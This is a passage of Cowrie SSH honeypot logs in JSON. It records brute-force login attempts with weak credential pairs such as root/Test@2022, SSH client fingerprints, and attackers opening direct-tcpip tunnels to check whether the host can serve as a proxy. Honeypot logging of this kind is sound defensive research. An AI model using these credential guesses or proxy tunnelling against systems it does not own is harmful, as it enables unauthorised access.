57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:49.886291Z","src_ip":"77.83.207.83","session":"6e6e449483b3"}
{"eventid":"cowrie.login.failed","username":"master","password":"password","message":"login attempt [master/password] failed","sensor":"my-vps","timestamp":"2025-08-31T03:52:49.911587Z","src_ip":"212.227.235.229","session":"9d387251d76e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:50.136716Z","src_ip":"77.83.207.83","session":"6e6e449483b3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2598,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:2598","sensor":"my-vps","timestamp":"2025-08-31T03:52:50.188010Z","session":"6e6e449483b3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:50.238606Z","src_ip":"77.83.207.83","session":"6e6e449483b3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15496,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:15496","sensor":"my-vps","timestamp":"2025-08-31T03:52:50.380873Z","session":"6e6e449483b3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:50.431632Z","src_ip":"77.83.207.83","session":"6e6e449483b3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":32631,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:32631","sensor":"my-vps","timestamp":"2025-08-31T03:52:50.573810Z","session":"6e6e449483b3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:50.624115Z","src_ip":"77.83.207.83","session":"6e6e449483b3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:50.675375Z","src_ip":"77.83.207.83","session":"6e6e449483b3"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36718,"dst_ip":"1.2.3.4","dst_port":22,"session":"b300e53b2aae","protocol":"ssh","message":"New connection: 77.83.207.83:36718 (1.2.3.4:22) [session: b300e53b2aae]","sensor":"my-vps","timestamp":"2025-08-31T03:52:50.724360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:50.725027Z","src_ip":"77.83.207.83","session":"b300e53b2aae"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:50.775310Z","src_ip":"77.83.207.83","session":"b300e53b2aae"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.025692Z","src_ip":"77.83.207.83","session":"b300e53b2aae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12176,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:12176","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.076872Z","session":"b300e53b2aae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.127025Z","src_ip":"77.83.207.83","session":"b300e53b2aae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13406,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:13406","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.268469Z","session":"b300e53b2aae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.318759Z","src_ip":"77.83.207.83","session":"b300e53b2aae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":10059,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:10059","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.460736Z","session":"b300e53b2aae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.510887Z","src_ip":"77.83.207.83","session":"b300e53b2aae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":30839,"dst_ip":"1.2.3.4","dst_port":22,"session":"8494be251dea","protocol":"ssh","message":"New connection: 212.227.235.229:30839 (1.2.3.4:22) [session: 8494be251dea]","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.558990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.560018Z","src_ip":"212.227.235.229","session":"8494be251dea"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.562013Z","src_ip":"77.83.207.83","session":"b300e53b2aae"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36836,"dst_ip":"1.2.3.4","dst_port":22,"session":"26f0c6d0967d","protocol":"ssh","message":"New connection: 77.83.207.83:36836 (1.2.3.4:22) [session: 26f0c6d0967d]","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.611030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.612083Z","src_ip":"77.83.207.83","session":"26f0c6d0967d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.662377Z","src_ip":"77.83.207.83","session":"26f0c6d0967d"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.697934Z","src_ip":"212.227.235.229","session":"8494be251dea"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.762609Z","src_ip":"212.227.235.229","session":"9d387251d76e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.913419Z","src_ip":"77.83.207.83","session":"26f0c6d0967d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12106,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:12106","sensor":"my-vps","timestamp":"2025-08-31T03:52:51.964477Z","session":"26f0c6d0967d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:52.015345Z","src_ip":"77.83.207.83","session":"26f0c6d0967d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":7861,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:7861","sensor":"my-vps","timestamp":"2025-08-31T03:52:52.156608Z","session":"26f0c6d0967d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:52.207004Z","src_ip":"77.83.207.83","session":"26f0c6d0967d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@123","message":"login attempt [admin/admin@123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:52:52.285863Z","src_ip":"212.227.235.229","session":"8494be251dea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":3375,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3375","sensor":"my-vps","timestamp":"2025-08-31T03:52:52.348638Z","session":"26f0c6d0967d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:52.399039Z","src_ip":"77.83.207.83","session":"26f0c6d0967d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:52.449992Z","src_ip":"77.83.207.83","session":"26f0c6d0967d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36910,"dst_ip":"1.2.3.4","dst_port":22,"session":"508911e3945d","protocol":"ssh","message":"New connection: 77.83.207.83:36910 (1.2.3.4:22) [session: 508911e3945d]","sensor":"my-vps","timestamp":"2025-08-31T03:52:52.499363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:52.500388Z","src_ip":"77.83.207.83","session":"508911e3945d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:52.550993Z","src_ip":"77.83.207.83","session":"508911e3945d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:52.803012Z","src_ip":"77.83.207.83","session":"508911e3945d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13713,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:13713","sensor":"my-vps","timestamp":"2025-08-31T03:52:52.854337Z","session":"508911e3945d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:52.904862Z","src_ip":"77.83.207.83","session":"508911e3945d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":24609,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:24609","sensor":"my-vps","timestamp":"2025-08-31T03:52:53.048803Z","session":"508911e3945d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:53.099195Z","src_ip":"77.83.207.83","session":"508911e3945d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":9126,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:9126","sensor":"my-vps","timestamp":"2025-08-31T03:52:53.240814Z","session":"508911e3945d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:53.291232Z","src_ip":"77.83.207.83","session":"508911e3945d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:53.342130Z","src_ip":"77.83.207.83","session":"508911e3945d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37030,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ffea7656283","protocol":"ssh","message":"New connection: 77.83.207.83:37030 (1.2.3.4:22) [session: 5ffea7656283]","sensor":"my-vps","timestamp":"2025-08-31T03:52:53.391274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:53.392157Z","src_ip":"77.83.207.83","session":"5ffea7656283"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:53.412965Z","src_ip":"212.227.235.229","session":"8494be251dea"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:53.442024Z","src_ip":"77.83.207.83","session":"5ffea7656283"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:53.692617Z","src_ip":"77.83.207.83","session":"5ffea7656283"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23585,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:23585","sensor":"my-vps","timestamp":"2025-08-31T03:52:53.743544Z","session":"5ffea7656283"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:53.793631Z","src_ip":"77.83.207.83","session":"5ffea7656283"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":27688,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:27688","sensor":"my-vps","timestamp":"2025-08-31T03:52:53.936526Z","session":"5ffea7656283"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:53.987109Z","src_ip":"77.83.207.83","session":"5ffea7656283"}
